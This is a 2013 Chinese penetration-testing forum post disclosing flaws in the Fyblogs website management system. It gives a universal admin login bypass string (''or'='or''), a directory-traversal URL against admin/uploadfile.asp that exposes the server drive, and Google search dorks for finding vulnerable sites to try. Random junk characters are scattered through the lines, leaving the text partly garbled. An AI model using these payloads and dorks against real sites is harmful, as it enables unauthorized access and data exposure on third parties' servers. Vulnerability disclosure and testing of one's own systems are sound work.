中国网络渗透测试联盟

标题: Fyblogs网站管理系统漏洞 [打印本页]
作者: admin    时间: 2013-3-7 13:07
标题: Fyblogs网站管理系统漏洞
漏洞类型: 未授权访问/权限绕过) r/ h" q+ O1 V* F
) A; C: B7 d: v; ^3 i/ g6 u# G) K
简要描述:
+ w4 y) `/ G! D( i6 l3 n  L4 ]' I& g& ~! a! i( Z5 C% Q7 B
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!2 `7 Z* B# M- ?2 C( ^4 T+ U

7 o  t# ~8 ?" Q. s& w详细说明:# m1 J6 ]0 {  C# c
1 O5 h6 `8 }' z$ @) M( D: A  K
后台万能密码 'or'='or'
6 C# [0 w' T$ @* Y- K后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
+ p& F) D" P8 [0 y1 fadmin/uploadfile.asp?currentFolder=/upfiles/../
1 A" [! k2 I! h: z0 a# d+ F1 ?; Y, v; O2 L# [, }
漏洞证明:
7 Z" s2 N6 ]1 ?3 l
; p2 D* ^# H! V" Q' z& u) z谷歌:inurl:type.asp?id=1 新闻中心3 r5 u. e$ |( _( {& `# b; X
或者 :inurl:download_ok.asp?
: b) K1 Z2 w6 U* A/ c$ D
/ F- c* u9 c+ H0 S/ Q& {% ~, j可以测试
" w6 S; ]" o; ^; H& L6 g$ G
4 x1 I# _$ A4 Q& F+ b& b3 h
  t3 e/ X  _9 i5 Y4 S- u! E9 E



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2